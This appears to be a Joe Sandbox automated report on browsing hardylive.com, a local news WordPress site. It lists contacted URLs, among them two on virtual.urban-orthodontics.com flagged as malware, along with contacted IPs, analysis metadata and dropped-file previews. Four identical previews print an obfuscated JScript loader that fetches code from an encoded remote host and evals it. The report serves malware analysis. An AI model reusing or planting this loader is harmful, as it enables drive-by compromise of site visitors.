                              https://hardylive.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1false
                              • Avira URL Cloud: safe
                              unknown
                              https://hardylive.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1false
                              • Avira URL Cloud: safe
                              unknown
                              https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?ver=56false
                              • Avira URL Cloud: safe
                              unknown
                              https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0false
                              • Avira URL Cloud: safe
                              unknown
                              https://hardylive.com/wp-content/themes/jnews/assets/dist/image/preloader.giffalse
                              • Avira URL Cloud: safe
                              unknown
                              https://hardylive.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a5false
                              • Avira URL Cloud: safe
                              unknown
                              https://virtual.urban-orthodontics.com/KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA==true
                              • Avira URL Cloud: malware
                              unknown
                              https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0false
                              • Avira URL Cloud: safe
                              unknown
                              https://hardylive.com/category/eprint/false
                                unknown
                                https://virtual.urban-orthodontics.com/mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LStrue
                                • Avira URL Cloud: malware
                                unknown
                                https://hardylive.com/wp-content/uploads/sites/35/2022/09/LRRE_Webad-1.giffalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hardylive.com/wp-includes/js/dist/url.min.js?ver=e87eb76272a3a08402d2false
                                • Avira URL Cloud: safe
                                unknown
                                https://hardylive.com/wp-includes/css/dist/block-library/style.min.css?ver=0b25e1false
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/skins/default/skin.chromecache_203.2.dr, chromecache_168.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://fontawesome.iochromecache_132.2.dr, chromecache_170.2.drfalse
                                  high
                                  https://code.tutsplus.com/articles/using-the-included-password-strength-meter-script-in-wordpress--wchromecache_191.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-fa4/fontchromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/2025/03/04/brenda-christine-staley-george/chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/2024/12/23/moorefield-examiner-eedition-december-25-2024/chromecache_203.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-comchromecache_203.2.dr, chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/category/opinion/chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/wp-includes/js/comment-reply.min.js?ver=0b25e1chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.27.6chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.27.6chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/2025/02/24/moorefield-examiner-eedition-february-26-2025/chromecache_203.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/2025/02/24/nina-garrett-rudy/chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core.js?chromecache_203.2.dr, chromecache_168.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.opensource.org/licenses/mit-license.phpchromecache_165.2.drfalse
                                    high
                                    https://hardylive.com/2025/03/04/mary-franklin-knotts-van-meter/chromecache_168.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.satollo.net/css-and-select-space-between-the-options-and-the-arrowchromecache_113.2.drfalse
                                      high
                                      https://hardylive.com/wp-admin/admin-ajax.php?action=rest-noncechromecache_203.2.dr, chromecache_168.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://hardylive.com/2025/02/17/moorefield-examiner-eedition-february-19-2025/#commentschromecache_203.2.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.gnu.org/licenses/gpl-2.0.htmlchromecache_147.2.dr, chromecache_152.2.drfalse
                                        high
                                        https://hardylive.com/category/eprint/feed/chromecache_203.2.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://hardylive.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-chromecache_203.2.dr, chromecache_168.2.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://hardylive.com/2025/03/04/hardy-county-scores/chromecache_168.2.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ns.attribution.com/ads/1.0/chromecache_181.2.dr, chromecache_189.2.drfalse
                                          high
                                          https://hardylive.com/2025/03/04/more-than-meals-on-wheels-hardy-county-committee-on-agings-provideschromecache_168.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://hardylive.com/2025/01/21/moorefield-examiner-eedition-january-22-2025/chromecache_203.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://hardylive.com/my-account/chromecache_168.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://hardylive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhardylive.com%2F&#038;format=xmlchromecache_168.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://hardylive.com/2025/01/21/moorefield-examiner-eedition-january-22-2025/#commentschromecache_203.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://hardylive.com/2025/02/24/owen-eugene-whetzel/chromecache_168.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://websitesetup.org/http-to-https-wordpress/chromecache_191.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://jegtheme.com/chromecache_147.2.drfalse
                                            high
                                            https://hardylive.com/2025/02/17/moorefield-examiner-eedition-february-19-2025/chromecache_203.2.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://hardylive.com/2025/02/03/moorefield-examiner-eedition-february-5-2025/chromecache_203.2.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.lostriverrealestate.com/chromecache_203.2.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://hardylive.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=chromecache_203.2.dr, chromecache_168.2.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://hardylive.com/2025/01/13/moorefield-examiner-eedition-january-15-2025/#commentschromecache_203.2.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://hardylive.com/category/sports/chromecache_168.2.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://instant.page/licensechromecache_203.2.dr, chromecache_168.2.drfalse
                                              high
                                              https://hardylive.com/2025/01/28/moorefield-examiner-eedition-january-29-2025/chromecache_203.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://hardylive.com/wp-content/plugins/user-registration/assets/css/user-registration.css?ver=4.1.chromecache_203.2.dr, chromecache_168.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://hardylive.com/2025/03/04/moorefield-examiner-eedition-march-5-2025/chromecache_168.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://hardylive.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?chromecache_203.2.dr, chromecache_168.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://hardylive.com/2025/03/04/centers-for-disease-control-release-new-avian-flu-update/#commentschromecache_168.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://hardylive.com/2025/03/04/certificate-of-need-laws-challenged-in-west-virginia/chromecache_168.2.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://BURKEANDHERBERTBANK.COMchromecache_203.2.dr, chromecache_168.2.drfalse
                                                high
                                                https://hardylive.com/category/breaking-news/chromecache_168.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://hardylive.com/2025/01/07/moorefield-examiner-eedition-january-8-2025/chromecache_203.2.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://gmpg.org/xfn/11chromecache_203.2.dr, chromecache_168.2.drfalse
                                                  high
                                                  https://hdmediaplus.com/outside-the-echo-chamber/chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://hardylive.com/wp-content/themes/jnews/assets/js/html5shiv.min.js?ver=1.0.0chromecache_203.2.dr, chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://hardylive.com/2025/03/04/new-warner-still-same-commitment-to-excellence-in-the-secretary-of-chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://hardylive.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=aab4achromecache_203.2.dr, chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://static.mailster.co/forms/dazzled-shocked-individual-dressed-in-casual-shirt.png);opacity:0%;chromecache_203.2.dr, chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://hardylive.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slntchromecache_203.2.dr, chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://hardylive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhardylive.com%2Fchromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://hardylive.com/2025/03/04/mary-margaret-marge-kuykendall/chromecache_168.2.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://malsup.com/jquery/block/chromecache_165.2.drfalse
                                                    high
                                                    http://ogp.me/ns#chromecache_168.2.drfalse
                                                      high
                                                      https://hardylive.com/2024/12/23/moorefield-examiner-eedition-december-25-2024/#commentschromecache_203.2.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gnu.org/licenses/gpl.htmlchromecache_165.2.drfalse
                                                        high
                                                        https://hardylive.com/2025/02/11/moorefield-examiner-eedition-february-12-2025/chromecache_203.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        185.76.79.50
                                                        virtual.urban-orthodontics.comSpain
                                                        50129TVHORADADAESfalse
                                                        46.173.214.32
                                                        apiexplorerzone.comRussian Federation
                                                        47196GARANT-PARK-INTERNETRUfalse
                                                        198.12.251.68
                                                        hardylive.comUnited States
                                                        26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                        188.114.97.3
                                                        static.mailster.coEuropean Union
                                                        13335CLOUDFLARENETUSfalse
                                                        45.77.88.11
                                                        g.adspeed.netUnited States
                                                        20473AS-CHOOPAUSfalse
                                                        172.67.188.237
                                                        adserver.paywallproject.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        172.217.16.196
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        IP
                                                        192.168.2.16
                                                        192.168.2.4
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1635542
                                                        Start date and time:2025-03-11 19:01:18 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 25s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:http://hardylive.com
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:20
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal72.phis.win@22/171@26/9
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 216.58.206.78, 172.217.18.3, 142.250.185.78, 66.102.1.84, 172.217.16.142, 142.250.186.110, 142.250.184.206, 142.250.186.142, 172.217.18.8, 142.250.184.195, 142.250.186.74, 142.251.39.110, 172.217.16.155, 142.250.186.91, 172.217.16.219, 172.217.23.123, 142.250.185.155, 142.250.185.91, 216.58.212.155, 142.250.184.251, 216.58.206.59, 172.217.18.27, 142.250.186.59, 216.58.206.91, 142.250.185.219, 142.250.186.123, 142.250.181.251, 142.250.185.187, 142.250.186.155, 216.58.212.187, 142.250.184.219, 142.250.186.187, 172.217.18.123, 142.250.181.238, 172.217.18.14, 216.58.212.138, 142.250.186.106, 172.217.18.106, 142.250.186.42, 216.58.212.170, 172.217.18.10, 142.250.186.138, 142.250.186.170, 172.217.16.138, 142.250.184.234, 142.250.185.74, 142.250.74.202, 172.217.16.202, 216.58.206.74, 142.250.184.202, 142.250.186.67, 142.250.185.174, 142.250.185.142, 64.233.184.100, 64.233.184.101, 64.233.184.102, 64.233.184.138, 64.233.184.113, 64.233.184.139, 23.60.203.209, 52.149.20.212
                                                        • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, storage.googleapis.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: http://hardylive.com
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1003), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1003
                                                        Entropy (8bit):5.83221244197075
                                                        Encrypted:false
                                                        SSDEEP:24:os/qeQeqDcSbMxibgUYFaAnN7pMb8ICegcUUrHM6Z:Z5L5SbMRUYFaAFM8IV3Bh
                                                        MD5:F2C12217F7031CDB03314D83CB033E6C
                                                        SHA1:7DC2C1952262A4769645875D6AFC30970F432672
                                                        SHA-256:9FF253F6969436F20025DF45F015515E4AC79AE14C2426A56E75441913512A81
                                                        SHA-512:3C1EE54EC8FE75D7E801DC0EBEB3545BDCB81F99D1D7410E8EBD18F95567824AD57A12BA4EBA372A9CECAE63C3446B7BA859EB75E90BC3A8DEC50F4C65FC8E53
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview://@cc_on var yt="Zn8ojiAazSUWb32g14GBvC/mD0YqdkRfMNFTVJt+XysEcpr9H56OIuleKPhLxw7Q";function cr(ge){var zo="";var hk,go,qc,ir,jh,wt,wy;var co=0;while(co<ge.length){ir=yt.indexOf(ge.charAt(co++));jh=yt.indexOf(ge.charAt(co++));wt=yt.indexOf(ge.charAt(co++));wy=yt.indexOf(ge.charAt(co++));hk=(ir<<2)|(jh>>4);go=((jh&15)<<4)|(wt>>2);qc=((wt&3)<<6)|wy;zo=zo+String.fromCharCode(hk);if(go&&wt!=64){zo=zo+String.fromCharCode(go);}if(qc&&wy!=64){zo=zo+String.fromCharCode(qc);}}return zo;}var xe=this;function pu(dh){var xy=cr('dtCOdAwrdlv');var xq=xy+cr('CACKkZ');var pu=dh[xq];return pu;};function xy(xq){return xq;};var qz=cr('BC3D');var tx=new xe[cr('1/3IYm0J/jwFYtCTkZ')](qz+cr('BvH6WJN3BjNvCiZ'));tx[cr('qenJqM')](cr('vjwBCZ'),cr('Ya4IdabhW6wTDm4NqAw+W+3sdliyqAS9Dm4OWt39qGwHdtwtY/5JBAiPqeCI'),true);tx[cr('dlCr0Z')](cr('0j004CJaGl5tGBCDdlNVYaX9BiCsk/uUBAC54AvH0TnbY/wGCmzOvj4ngBI'));while(true){xe[cr('Cu3z')][cr('vl5J0mZ')](1000);if(tx[cr('dtCN0aJBkAiI01')]==4){xe[cr('0m0NqZ')](xy(pu(tx)));break;}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1003), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1003
                                                        Entropy (8bit):5.83221244197075
                                                        Encrypted:false
                                                        SSDEEP:24:os/qeQeqDcSbMxibgUYFaAnN7pMb8ICegcUUrHM6Z:Z5L5SbMRUYFaAFM8IV3Bh
                                                        MD5:F2C12217F7031CDB03314D83CB033E6C
                                                        SHA1:7DC2C1952262A4769645875D6AFC30970F432672
                                                        SHA-256:9FF253F6969436F20025DF45F015515E4AC79AE14C2426A56E75441913512A81
                                                        SHA-512:3C1EE54EC8FE75D7E801DC0EBEB3545BDCB81F99D1D7410E8EBD18F95567824AD57A12BA4EBA372A9CECAE63C3446B7BA859EB75E90BC3A8DEC50F4C65FC8E53
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview://@cc_on var yt="Zn8ojiAazSUWb32g14GBvC/mD0YqdkRfMNFTVJt+XysEcpr9H56OIuleKPhLxw7Q";function cr(ge){var zo="";var hk,go,qc,ir,jh,wt,wy;var co=0;while(co<ge.length){ir=yt.indexOf(ge.charAt(co++));jh=yt.indexOf(ge.charAt(co++));wt=yt.indexOf(ge.charAt(co++));wy=yt.indexOf(ge.charAt(co++));hk=(ir<<2)|(jh>>4);go=((jh&15)<<4)|(wt>>2);qc=((wt&3)<<6)|wy;zo=zo+String.fromCharCode(hk);if(go&&wt!=64){zo=zo+String.fromCharCode(go);}if(qc&&wy!=64){zo=zo+String.fromCharCode(qc);}}return zo;}var xe=this;function pu(dh){var xy=cr('dtCOdAwrdlv');var xq=xy+cr('CACKkZ');var pu=dh[xq];return pu;};function xy(xq){return xq;};var qz=cr('BC3D');var tx=new xe[cr('1/3IYm0J/jwFYtCTkZ')](qz+cr('BvH6WJN3BjNvCiZ'));tx[cr('qenJqM')](cr('vjwBCZ'),cr('Ya4IdabhW6wTDm4NqAw+W+3sdliyqAS9Dm4OWt39qGwHdtwtY/5JBAiPqeCI'),true);tx[cr('dlCr0Z')](cr('0j004CJaGl5tGBCDdlNVYaX9BiCsk/uUBAC54AvH0TnbY/wGCmzOvj4ngBI'));while(true){xe[cr('Cu3z')][cr('vl5J0mZ')](1000);if(tx[cr('dtCN0aJBkAiI01')]==4){xe[cr('0m0NqZ')](xy(pu(tx)));break;}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1003), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1003
                                                        Entropy (8bit):5.83221244197075
                                                        Encrypted:false
                                                        SSDEEP:24:os/qeQeqDcSbMxibgUYFaAnN7pMb8ICegcUUrHM6Z:Z5L5SbMRUYFaAFM8IV3Bh
                                                        MD5:F2C12217F7031CDB03314D83CB033E6C
                                                        SHA1:7DC2C1952262A4769645875D6AFC30970F432672
                                                        SHA-256:9FF253F6969436F20025DF45F015515E4AC79AE14C2426A56E75441913512A81
                                                        SHA-512:3C1EE54EC8FE75D7E801DC0EBEB3545BDCB81F99D1D7410E8EBD18F95567824AD57A12BA4EBA372A9CECAE63C3446B7BA859EB75E90BC3A8DEC50F4C65FC8E53
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview://@cc_on var yt="Zn8ojiAazSUWb32g14GBvC/mD0YqdkRfMNFTVJt+XysEcpr9H56OIuleKPhLxw7Q";function cr(ge){var zo="";var hk,go,qc,ir,jh,wt,wy;var co=0;while(co<ge.length){ir=yt.indexOf(ge.charAt(co++));jh=yt.indexOf(ge.charAt(co++));wt=yt.indexOf(ge.charAt(co++));wy=yt.indexOf(ge.charAt(co++));hk=(ir<<2)|(jh>>4);go=((jh&15)<<4)|(wt>>2);qc=((wt&3)<<6)|wy;zo=zo+String.fromCharCode(hk);if(go&&wt!=64){zo=zo+String.fromCharCode(go);}if(qc&&wy!=64){zo=zo+String.fromCharCode(qc);}}return zo;}var xe=this;function pu(dh){var xy=cr('dtCOdAwrdlv');var xq=xy+cr('CACKkZ');var pu=dh[xq];return pu;};function xy(xq){return xq;};var qz=cr('BC3D');var tx=new xe[cr('1/3IYm0J/jwFYtCTkZ')](qz+cr('BvH6WJN3BjNvCiZ'));tx[cr('qenJqM')](cr('vjwBCZ'),cr('Ya4IdabhW6wTDm4NqAw+W+3sdliyqAS9Dm4OWt39qGwHdtwtY/5JBAiPqeCI'),true);tx[cr('dlCr0Z')](cr('0j004CJaGl5tGBCDdlNVYaX9BiCsk/uUBAC54AvH0TnbY/wGCmzOvj4ngBI'));while(true){xe[cr('Cu3z')][cr('vl5J0mZ')](1000);if(tx[cr('dtCN0aJBkAiI01')]==4){xe[cr('0m0NqZ')](xy(pu(tx)));break;}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1003), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):1003
                                                        Entropy (8bit):5.83221244197075
                                                        Encrypted:false
                                                        SSDEEP:24:os/qeQeqDcSbMxibgUYFaAnN7pMb8ICegcUUrHM6Z:Z5L5SbMRUYFaAFM8IV3Bh
                                                        MD5:F2C12217F7031CDB03314D83CB033E6C
                                                        SHA1:7DC2C1952262A4769645875D6AFC30970F432672
                                                        SHA-256:9FF253F6969436F20025DF45F015515E4AC79AE14C2426A56E75441913512A81
                                                        SHA-512:3C1EE54EC8FE75D7E801DC0EBEB3545BDCB81F99D1D7410E8EBD18F95567824AD57A12BA4EBA372A9CECAE63C3446B7BA859EB75E90BC3A8DEC50F4C65FC8E53
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview://@cc_on var yt="Zn8ojiAazSUWb32g14GBvC/mD0YqdkRfMNFTVJt+XysEcpr9H56OIuleKPhLxw7Q";function cr(ge){var zo="";var hk,go,qc,ir,jh,wt,wy;var co=0;while(co<ge.length){ir=yt.indexOf(ge.charAt(co++));jh=yt.indexOf(ge.charAt(co++));wt=yt.indexOf(ge.charAt(co++));wy=yt.indexOf(ge.charAt(co++));hk=(ir<<2)|(jh>>4);go=((jh&15)<<4)|(wt>>2);qc=((wt&3)<<6)|wy;zo=zo+String.fromCharCode(hk);if(go&&wt!=64){zo=zo+String.fromCharCode(go);}if(qc&&wy!=64){zo=zo+String.fromCharCode(qc);}}return zo;}var xe=this;function pu(dh){var xy=cr('dtCOdAwrdlv');var xq=xy+cr('CACKkZ');var pu=dh[xq];return pu;};function xy(xq){return xq;};var qz=cr('BC3D');var tx=new xe[cr('1/3IYm0J/jwFYtCTkZ')](qz+cr('BvH6WJN3BjNvCiZ'));tx[cr('qenJqM')](cr('vjwBCZ'),cr('Ya4IdabhW6wTDm4NqAw+W+3sdliyqAS9Dm4OWt39qGwHdtwtY/5JBAiPqeCI'),true);tx[cr('dlCr0Z')](cr('0j004CJaGl5tGBCDdlNVYaX9BiCsk/uUBAC54AvH0TnbY/wGCmzOvj4ngBI'));while(true){xe[cr('Cu3z')][cr('vl5J0mZ')](1000);if(tx[cr('dtCN0aJBkAiI01')]==4){xe[cr('0m0NqZ')](xy(pu(tx)));break;}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (2356), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):2356
                                                        Entropy (8bit):5.165365328792604
                                                        Encrypted:false
                                                        SSDEEP:48:svOyYwhnYsmh1q72HATBS0KjEGJeigjcs5WTwBHlBUffbkuq:svOGq1q7HS0KgGJeiY95WWjgK
                                                        MD5:9CF70B7D6F2CC90CBA9EE4F76EEAA92C
                                                        SHA1:E8B296C630F6A246A051E71B463E00C66E43876D
                                                        SHA-256:363AA2D4106F0F661A989977347DC0A55B612DE18D3C0247CECC0CA725F98270
                                                        SHA-512:29FA19D4E3D3C62CBDA3C8A5CED9B74D098EFAC2091511990A18007320113B68710ADC3F0A66EEF4B23B8634354A81D257AB3E432129B1788D379352D68E8219
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=aab4a5
                                                        Preview:!function(t){"use strict";const e=t.params,n=(document.querySelector.bind(document),(t,e)=>e.split(".").reduce((t,e)=>t&&t[e],t)),i=()=>null,s=t=>null===t||t===undefined?"":t,o="wc/store/checkout";function a(t){window.wp&&window.wp.data&&window.wp.data.dispatch&&window.wc&&window.wc.wcBlocksData&&window.wp.data.dispatch(window.wc.wcBlocksData.CHECKOUT_STORE_KEY).__internalSetExtensionData("woocommerce/order-attribution",t,!0)}function r(){return"undefined"!=typeof sbjs}function c(){if(window.wp&&window.wp.data&&"function"==typeof window.wp.data.subscribe){const e=window.wp.data.subscribe(function(){e(),a(t.getAttributionData())},o)}}t.getAttributionData=function(){const s=e.allowTracking&&r()?n:i,o=r()?sbjs.get:{},a=Object.entries(t.fields).map(([t,e])=>[t,s(o,e)]);return Object.fromEntries(a)},t.setOrderTracking=function(n){if(e.allowTracking=n,n){if(!r())return;sbjs.init({lifetime:Number(e.lifetime),session_length:Number(e.session),base64:Boolean(e.base64),timezone_offset:"0"})}else!
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):6840
                                                        Entropy (8bit):4.878689362553049
                                                        Encrypted:false
                                                        SSDEEP:192:G5Mv5mn5aytRcxot2xyxf2Rv+xNHfxcNA8rVb4S21UgE6ElUjH:ItRltry8O9U
                                                        MD5:689D862214578091F93EB574DD07C438
                                                        SHA1:2391CA29E45D3AF5D78B708E8FEFD731AB839622
                                                        SHA-256:AD04F928276C55E270FDE181949549ACD09AC3827FB0CD57947F80C2CE53E7F4
                                                        SHA-512:FFE4429D2C4D91465A170C51887BD58DAB4C1CDFD52ACB80B17097C728914DC5FF21D48B7DC91EAFF2E3B48F945A5B07A00708D0C29B8BE91E3BE885B18EAAE8
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/newsletter/style.css?ver=8.7.1
                                                        Preview:/*..THIS FILE IS OVERWRITTEN EVERY TIME YOU UPDATE THE PLUGIN..USE THE CUSTOM CSS OPTION IN THE SUBSCRIPTION SETTING PANEL FOR YOUR.CUSTOM CSS RULES...*/..div.tnp-subscription,.form.tnp-subscription, form.tnp-profile {. display: block;. margin: 1em auto;. max-width: 500px;. width: 100%;.}..div.tnp-profile {. display: block;. margin: 1em 0;. max-width: 500px;. /*width: 100%;*/.}../* Generic field wrapper */..tnp-subscription div.tnp-field,..tnp-profile div.tnp-field.{. margin-bottom: .7em;. border: 0;. padding: 0;.}...tnp-subscription label,..tnp-profile label.{. display: block;. color: inherit;. font-weight: normal;. line-height: normal;. padding: 0;. margin: 0;. margin-bottom: .25em;. font-size: .9em;.}...tnp-subscription .tnp-field-checkbox label,..tnp-profile .tnp-field-checkbox label.{. display: inline-block;.}...tnp-subscription input[type=text],..tnp-subscription input[type=email],..tnp-subscription input[type=submit],..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:dropped
                                                        Size (bytes):140623
                                                        Entropy (8bit):7.978193587058357
                                                        Encrypted:false
                                                        SSDEEP:3072:ZVwpa60RitFtccRvunv+fs6+CBH+HMvGNl7+qXuau:nqL0Mjuv+uC5+HbLXc
                                                        MD5:1D7C494737EDB9395F19021F308EF830
                                                        SHA1:D6D06DFBC381FB9E2568BE164AB73ABF6A457DC9
                                                        SHA-256:F1CFD348286A1B8C7570F24DA56002DC7CD1156446610A4E2689AEC223134568
                                                        SHA-512:044ACF0323563AD9A5E58C09ABA563909D9B7CD2593430558C0B27A8BAE590EB11234C4C6F44D1BFD3B767B89F2C46FF8C1028FA8DE6FAA7FD2B2E27EBF49E0B
                                                        Malicious:false
                                                        Reputation:low
